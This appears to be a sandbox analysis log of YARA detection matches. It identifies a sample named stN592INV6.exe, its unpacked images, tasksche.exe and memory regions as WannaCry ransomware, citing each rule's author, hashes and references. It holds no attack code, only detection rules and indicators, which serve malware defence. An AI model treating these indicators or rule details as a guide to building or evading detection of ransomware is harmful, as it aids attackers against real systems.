Source: stN592INV6.exe, type: SAMPLE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: stN592INV6.exe, type: SAMPLE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 1.2.stN592INV6.exe.1fe70a4.4.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_Imphash_Mar23_2 date = 2023-03-23, author = Arnim Rupp (https://github.com/ruppde), description = Detects imphash often found in malware samples (Zero hits with with search for \'imphash:x p:0\' on Virustotal), score = 12bf2795f4a140adbaa0af6ad4b2508d398d8ba69e9dadb155f800b10f7458c4, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License, hash = 5b9348c24ff604e78d70464654e645b90dc695c7e0415959c443fe29cebc3c4e
Source: 1.2.stN592INV6.exe.1fdc084.5.raw.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.2.stN592INV6.exe.25078e8.7.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_Imphash_Mar23_2 date = 2023-03-23, author = Arnim Rupp (https://github.com/ruppde), description = Detects imphash often found in malware samples (Zero hits with with search for \'imphash:x p:0\' on Virustotal), score = 12bf2795f4a140adbaa0af6ad4b2508d398d8ba69e9dadb155f800b10f7458c4, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License, hash = 5b9348c24ff604e78d70464654e645b90dc695c7e0415959c443fe29cebc3c4e
Source: 1.2.stN592INV6.exe.24fc8c8.9.raw.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.2.stN592INV6.exe.250b948.8.raw.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.2.stN592INV6.exe.250b948.8.raw.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (Nextron Systems) (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
Source: 1.2.stN592INV6.exe.250b948.8.raw.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 1.2.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.2.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 1.2.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 1.0.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.0.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 1.0.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.0.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 0.0.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (Nextron Systems) (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
Source: 0.0.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 0.0.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.2.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 0.2.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 0.2.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 1.2.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.2.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (Nextron Systems) (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
Source: 1.2.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 1.2.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 2.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 2.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 2.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.2.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 0.2.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (Nextron Systems) (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
Source: 0.2.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 0.2.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 1.2.stN592INV6.exe.1fe70a4.4.unpack, type: UNPACKEDPE	Matched rule: SUSP_Imphash_Mar23_2 date = 2023-03-23, author = Arnim Rupp (https://github.com/ruppde), description = Detects imphash often found in malware samples (Zero hits with with search for \'imphash:x p:0\' on Virustotal), score = 12bf2795f4a140adbaa0af6ad4b2508d398d8ba69e9dadb155f800b10f7458c4, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License, hash = 5b9348c24ff604e78d70464654e645b90dc695c7e0415959c443fe29cebc3c4e
Source: 1.2.stN592INV6.exe.1fe70a4.4.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.2.stN592INV6.exe.1fe70a4.4.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 1.2.stN592INV6.exe.1feb104.2.raw.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.2.stN592INV6.exe.1feb104.2.raw.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (Nextron Systems) (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
Source: 1.2.stN592INV6.exe.1feb104.2.raw.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 0.0.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 0.0.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 0.0.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 1.0.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.0.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (Nextron Systems) (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
Source: 1.0.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 1.0.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 1.2.stN592INV6.exe.200e128.3.raw.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.2.stN592INV6.exe.200e128.3.raw.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 1.2.stN592INV6.exe.200e128.3.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.0.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 0.0.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 0.0.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 1.2.stN592INV6.exe.252e96c.6.raw.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.2.stN592INV6.exe.252e96c.6.raw.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 1.2.stN592INV6.exe.252e96c.6.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 1.2.stN592INV6.exe.252e96c.6.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.2.stN592INV6.exe.252e96c.6.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 1.2.stN592INV6.exe.252e96c.6.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 1.0.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.0.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 1.0.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 2.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 2.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 2.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 1.2.stN592INV6.exe.1fdc084.5.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.2.stN592INV6.exe.1fdc084.5.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (Nextron Systems) (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
Source: 1.2.stN592INV6.exe.1fdc084.5.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 1.2.stN592INV6.exe.1fdc084.5.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 1.2.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.2.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 1.2.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.2.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 0.2.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 0.2.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 1.2.stN592INV6.exe.24fc8c8.9.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.2.stN592INV6.exe.24fc8c8.9.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (Nextron Systems) (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
Source: 1.2.stN592INV6.exe.250b948.8.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.2.stN592INV6.exe.250b948.8.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 1.2.stN592INV6.exe.200e128.3.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.2.stN592INV6.exe.200e128.3.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 1.2.stN592INV6.exe.200e128.3.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 1.2.stN592INV6.exe.25078e8.7.unpack, type: UNPACKEDPE	Matched rule: SUSP_Imphash_Mar23_2 date = 2023-03-23, author = Arnim Rupp (https://github.com/ruppde), description = Detects imphash often found in malware samples (Zero hits with with search for \'imphash:x p:0\' on Virustotal), score = 12bf2795f4a140adbaa0af6ad4b2508d398d8ba69e9dadb155f800b10f7458c4, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License, hash = 5b9348c24ff604e78d70464654e645b90dc695c7e0415959c443fe29cebc3c4e
Source: 1.2.stN592INV6.exe.25078e8.7.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.2.stN592INV6.exe.25078e8.7.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 1.2.stN592INV6.exe.1feb104.2.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.2.stN592INV6.exe.1feb104.2.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000002.00000000.355218955.000000000040E000.00000008.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000000.00000002.358785850.0000000000710000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000001.00000002.619719683.0000000001FEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000001.00000002.621829646.000000000250B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
